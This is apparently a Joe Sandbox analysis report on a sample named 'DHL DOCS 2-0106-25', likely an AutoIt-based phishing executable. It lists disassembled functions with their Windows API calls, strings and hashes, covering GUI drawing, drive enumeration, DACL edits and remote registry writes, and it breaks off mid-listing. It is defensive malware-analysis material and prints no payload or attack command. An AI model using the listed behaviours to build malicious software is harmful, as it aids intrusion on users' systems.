Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: b6634a502810563fe16009a6ddb4cd22453e79ec0c89e88fe0943de7fcd7ef5f
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 5F8173736080A339EB2D827A857403EFFE15A923A531A079FD4F2CA2D1EF249554E620

Function 00232ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00232B30
DeleteObject.GDI32(00000000), ref: 00232B43
DestroyWindow.USER32 ref: 00232B52
GetDesktopWindow.USER32 ref: 00232B6D
GetWindowRect.USER32(00000000), ref: 00232B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00232CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00232CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232CF8
GetClientRect.USER32(00000000,?), ref: 00232D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00232D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232D80
GlobalLock.KERNEL32(00000000), ref: 00232D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232D98
GlobalUnlock.KERNEL32(00000000), ref: 00232DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232DA8
GlobalFree.KERNEL32(00000000), ref: 00232DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0024FC38,00000000), ref: 00232DDB
GlobalFree.KERNEL32(00000000), ref: 00232DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00232E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00232E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00232E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023303F

Strings

, xrefs: 00232FC5
static, xrefs: 00232D3A, 00232E91
DISPLAY, xrefs: 00232EA2
AutoIt v3, xrefs: 00232CF2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d97cdffd67df94f96d1b57bc0e3c4af9d86c5679659039af4e2c56788cb0ec1c
Instruction ID: 31345695f07b71b40f7baf419402a0756674378117cab80f55dd78caadcf8854
Opcode Fuzzy Hash: d97cdffd67df94f96d1b57bc0e3c4af9d86c5679659039af4e2c56788cb0ec1c
Instruction Fuzzy Hash: 00027BB5611205EFDB14DFA8DC8DEAE7BB9EF49310F108558F915AB2A1CB70AD01CB60

Function 002470D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0024712F
GetSysColorBrush.USER32(0000000F), ref: 00247160
GetSysColor.USER32(0000000F), ref: 0024716C
SetBkColor.GDI32(?,000000FF), ref: 00247186
SelectObject.GDI32(?,?), ref: 00247195
InflateRect.USER32(?,000000FF,000000FF), ref: 002471C0
GetSysColor.USER32(00000010), ref: 002471C8
CreateSolidBrush.GDI32(00000000), ref: 002471CF
FrameRect.USER32(?,?,00000000), ref: 002471DE
DeleteObject.GDI32(00000000), ref: 002471E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00247230
FillRect.USER32(?,?,?), ref: 00247262
GetWindowLongW.USER32(?,000000F0), ref: 00247284

Part of subcall function 002473E8: GetSysColor.USER32(00000012), ref: 00247421
Part of subcall function 002473E8: SetTextColor.GDI32(?,?), ref: 00247425
Part of subcall function 002473E8: GetSysColorBrush.USER32(0000000F), ref: 0024743B
Part of subcall function 002473E8: GetSysColor.USER32(0000000F), ref: 00247446
Part of subcall function 002473E8: GetSysColor.USER32(00000011), ref: 00247463
Part of subcall function 002473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00247471
Part of subcall function 002473E8: SelectObject.GDI32(?,00000000), ref: 00247482
Part of subcall function 002473E8: SetBkColor.GDI32(?,00000000), ref: 0024748B
Part of subcall function 002473E8: SelectObject.GDI32(?,?), ref: 00247498
Part of subcall function 002473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002474B7
Part of subcall function 002473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002474CE
Part of subcall function 002473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002474DB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 6bc19419ea3377b2b92a83704d46f28aa82033a3b03350a43cd5dc268c5e6dc6
Instruction ID: 7def95dcbf423aacb879cbd135a8b816a2266d3f8197f66a02db37f33e4eae0e
Opcode Fuzzy Hash: 6bc19419ea3377b2b92a83704d46f28aa82033a3b03350a43cd5dc268c5e6dc6
Instruction Fuzzy Hash: 96A1C176019302AFD755DF64EC4CE5B7BA9FB8A320F200A19F966A61E1D770E804CF51

Function 001C8D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001C8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00206AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00206AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00206F43

Part of subcall function 001C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001C8BE8,?,00000000,?,?,?,?,001C8BBA,00000000,?), ref: 001C8FC5

SendMessageW.USER32(?,00001053), ref: 00206F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00206F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00206FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00206FB7

Strings

0, xrefs: 00206DCF
8], xrefs: 001C8DC2, 00206ADC, 00206B10, 00206B5F, 00206B9F, 00206C47, 00206CE8, 00206D8C, 00206E18, 00206EEF, 00206F15, 00206FC8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$8]
API String ID: 2760611726-1966601199
Opcode ID: ce0a78f8d517e2a5a8c753cee482bcd0ade232c92fee3ba88e41582181d76983
Instruction ID: 78f6129fd8c85484ad84db5a4d0722c1efb38b78740b08aae6d795761c6bb1fe
Opcode Fuzzy Hash: ce0a78f8d517e2a5a8c753cee482bcd0ade232c92fee3ba88e41582181d76983
Instruction Fuzzy Hash: 85128B342112129FD725DF18D88CFA9B7E5FB55300F14446DE4959B6A2CB31E872CB91

Function 00232711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0023273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0023286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002328A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002328B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00232900
GetClientRect.USER32(00000000,?), ref: 0023290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00232955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00232964
GetStockObject.GDI32(00000011), ref: 00232974
SelectObject.GDI32(00000000,00000000), ref: 00232978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00232988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00232991
DeleteDC.GDI32(00000000), ref: 0023299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002329C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002329DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00232A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00232A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00232A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00232A77
GetStockObject.GDI32(00000011), ref: 00232A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00232A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00232A97

Strings

static, xrefs: 0023294F, 00232A71
msctls_progress32, xrefs: 00232A13
DISPLAY, xrefs: 0023295A
AutoIt v3, xrefs: 002328F8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 9c6eb3456334664fc3fc9a817437b18f30cadc281b05037dc8d3b9fd7f76162d
Instruction ID: 09bbf9ff278789bd029cef1896f36d7c4ce0493086846d1a6ce1caea1f011529
Opcode Fuzzy Hash: 9c6eb3456334664fc3fc9a817437b18f30cadc281b05037dc8d3b9fd7f76162d
Instruction Fuzzy Hash: 14B18DB5A11205AFEB14CF68DC89FAEBBA9EF49710F108554F915E72D0D770AD10CBA0

Function 00224ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00224AED
GetDriveTypeW.KERNEL32(?,0024CB68,?,\\.\,0024CC08), ref: 00224BCA
SetErrorMode.KERNEL32(00000000,0024CB68,?,\\.\,0024CC08), ref: 00224D36

Strings

SSA, xrefs: 00224CA6
Removable, xrefs: 00224C10, 00224C15
\\.\, xrefs: 00224B3F
CDROM, xrefs: 00224BFB
SCSI, xrefs: 00224C8A
MMC, xrefs: 00224CDE
RAMDisk, xrefs: 00224BF4
iSCSI, xrefs: 00224CC2
PhysicalDrive, xrefs: 00224B76
Network, xrefs: 00224C02
Unknown, xrefs: 00224BED, 00224C83
RAID, xrefs: 00224CBB
ATAPI, xrefs: 00224C91
Virtual, xrefs: 00224CE5
FileBackedVirtual, xrefs: 00224CEC
Fixed, xrefs: 00224C09
SATA, xrefs: 00224CD0
ATA, xrefs: 00224C98
1394, xrefs: 00224C9F
USB, xrefs: 00224CB4
SAS, xrefs: 00224CC9
Fibre, xrefs: 00224CAD
SSD, xrefs: 00224C4A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 62d2b1bfb2632d3bcb35e3b5ea83e24300c742a1a86d621232e3f71474660e54
Instruction ID: 78a47ebf4a0a72566d02e02ee9af7d452ef26247b735143fd9490129711a07ec
Opcode Fuzzy Hash: 62d2b1bfb2632d3bcb35e3b5ea83e24300c742a1a86d621232e3f71474660e54
Instruction Fuzzy Hash: 3A610630631516FBCB15FFA8EA89DAC77A0AB15304B208117F80AAB651DFB1DD71DB41

Function 002473E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00247421
SetTextColor.GDI32(?,?), ref: 00247425
GetSysColorBrush.USER32(0000000F), ref: 0024743B
GetSysColor.USER32(0000000F), ref: 00247446
CreateSolidBrush.GDI32(?), ref: 0024744B
GetSysColor.USER32(00000011), ref: 00247463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00247471
SelectObject.GDI32(?,00000000), ref: 00247482
SetBkColor.GDI32(?,00000000), ref: 0024748B
SelectObject.GDI32(?,?), ref: 00247498
InflateRect.USER32(?,000000FF,000000FF), ref: 002474B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002474CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002474DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0024752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00247554
InflateRect.USER32(?,000000FD,000000FD), ref: 00247572
DrawFocusRect.USER32(?,?), ref: 0024757D
GetSysColor.USER32(00000011), ref: 0024758E
SetTextColor.GDI32(?,00000000), ref: 00247596
DrawTextW.USER32(?,002470F5,000000FF,?,00000000), ref: 002475A8
SelectObject.GDI32(?,?), ref: 002475BF
DeleteObject.GDI32(?), ref: 002475CA
SelectObject.GDI32(?,?), ref: 002475D0
DeleteObject.GDI32(?), ref: 002475D5
SetTextColor.GDI32(?,?), ref: 002475DB
SetBkColor.GDI32(?,?), ref: 002475E5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 534e5f458706fceaaa084029fceb5fd8b2f65c1c49ef89294c1edab6637ddd66
Instruction ID: c95b054ad0edc27fc79f1f8ded5dbd940df40a0e2b1e8e2dcdecda9992fd4293
Opcode Fuzzy Hash: 534e5f458706fceaaa084029fceb5fd8b2f65c1c49ef89294c1edab6637ddd66
Instruction Fuzzy Hash: 98618D76901218AFDF059FA8EC48EEEBFB9EB09320F214115F915BB2A1D7709950CF90

Function 00240FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00241128
GetDesktopWindow.USER32 ref: 0024113D
GetWindowRect.USER32(00000000), ref: 00241144
GetWindowLongW.USER32(?,000000F0), ref: 00241199
DestroyWindow.USER32(?), ref: 002411B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002411ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0024120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0024121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00241232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00241245
IsWindowVisible.USER32(00000000), ref: 002412A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002412BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002412D0
GetWindowRect.USER32(00000000,?), ref: 002412E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0024130E
GetMonitorInfoW.USER32(00000000,?), ref: 00241328
CopyRect.USER32(?,?), ref: 0024133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002413AA

Strings

0, xrefs: 002410D3
tooltips_class32, xrefs: 002411E6
(, xrefs: 0024131B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f0e6c0c226c742819b40a593ed9dc00ba6e9d012b42ea8646a7aaea0aa0b5f02
Instruction ID: 637eb4d2c7dfd4ce507133a0e8b6a44c462ddddde7990ff51f3b13c8bf78590f
Opcode Fuzzy Hash: f0e6c0c226c742819b40a593ed9dc00ba6e9d012b42ea8646a7aaea0aa0b5f02
Instruction Fuzzy Hash: 17B19F71618341AFD714DF64D888BAEBBE4FF85350F00891CF9999B261C771E8A4CB92

Function 001C8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001C8968
GetSystemMetrics.USER32(00000007), ref: 001C8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001C899B
GetSystemMetrics.USER32(00000008), ref: 001C89A3
GetSystemMetrics.USER32(00000004), ref: 001C89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001C89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001C89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001C8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001C8A3C
GetClientRect.USER32(00000000,000000FF), ref: 001C8A5A
GetStockObject.GDI32(00000011), ref: 001C8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 001C8A81

Part of subcall function 001C912D: GetCursorPos.USER32(?), ref: 001C9141
Part of subcall function 001C912D: ScreenToClient.USER32(00000000,?), ref: 001C915E
Part of subcall function 001C912D: GetAsyncKeyState.USER32(00000001), ref: 001C9183
Part of subcall function 001C912D: GetAsyncKeyState.USER32(00000002), ref: 001C919D

SetTimer.USER32(00000000,00000000,00000028,001C90FC), ref: 001C8AA8

Strings

AutoIt v3 GUI, xrefs: 001C8A20

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c6747745b81d1d14acdfe5cd255540d5883164918cc5e2efc7366da112d53a8a
Instruction ID: cc1b2412b02903e61bf42b64b6435610a61a8e82f3dd62e2246bd14777c7852c
Opcode Fuzzy Hash: c6747745b81d1d14acdfe5cd255540d5883164918cc5e2efc7366da112d53a8a
Instruction Fuzzy Hash: 9AB18E35A0120AAFDB14DFA8DC89FAE7BB5FB48314F114219FA15A72D0DB34E861CB51

Function 00210D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00211114
Part of subcall function 002110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211120
Part of subcall function 002110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 0021112F
Part of subcall function 002110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211136
Part of subcall function 002110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0021114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00210DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00210E29
GetLengthSid.ADVAPI32(?), ref: 00210E40
GetAce.ADVAPI32(?,00000000,?), ref: 00210E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00210E96
GetLengthSid.ADVAPI32(?), ref: 00210EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00210EB5
HeapAlloc.KERNEL32(00000000), ref: 00210EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00210EDD
CopySid.ADVAPI32(00000000), ref: 00210EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00210F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00210F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00210F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210F6E
HeapFree.KERNEL32(00000000), ref: 00210F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210F7E
HeapFree.KERNEL32(00000000), ref: 00210F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210F8E
HeapFree.KERNEL32(00000000), ref: 00210F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00210FA1
HeapFree.KERNEL32(00000000), ref: 00210FA8

Part of subcall function 00211193: GetProcessHeap.KERNEL32(00000008,00210BB1,?,00000000,?,00210BB1,?), ref: 002111A1
Part of subcall function 00211193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00210BB1,?), ref: 002111A8
Part of subcall function 00211193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00210BB1,?), ref: 002111B7

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: a1208c8ab7df2cf7063b1084284dcc06e4d9bff7fbfcecda406b9feef5bbd131
Instruction ID: 453f19c41594488aa5121c04f109859ac183fa97beeb52fc56abc8ebcaad47dc
Opcode Fuzzy Hash: a1208c8ab7df2cf7063b1084284dcc06e4d9bff7fbfcecda406b9feef5bbd131
Instruction Fuzzy Hash: CE719E7190120AEBDF209FA5EC89FEEBBB8BF15300F144125F918E6191DB709996CB60

Function 0023C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0023C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0024CC08,00000000,?,00000000,?,?), ref: 0023C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0023C5A4
_wcslen.LIBCMT ref: 0023C5F4
_wcslen.LIBCMT ref: 0023C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0023C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0023C7C1
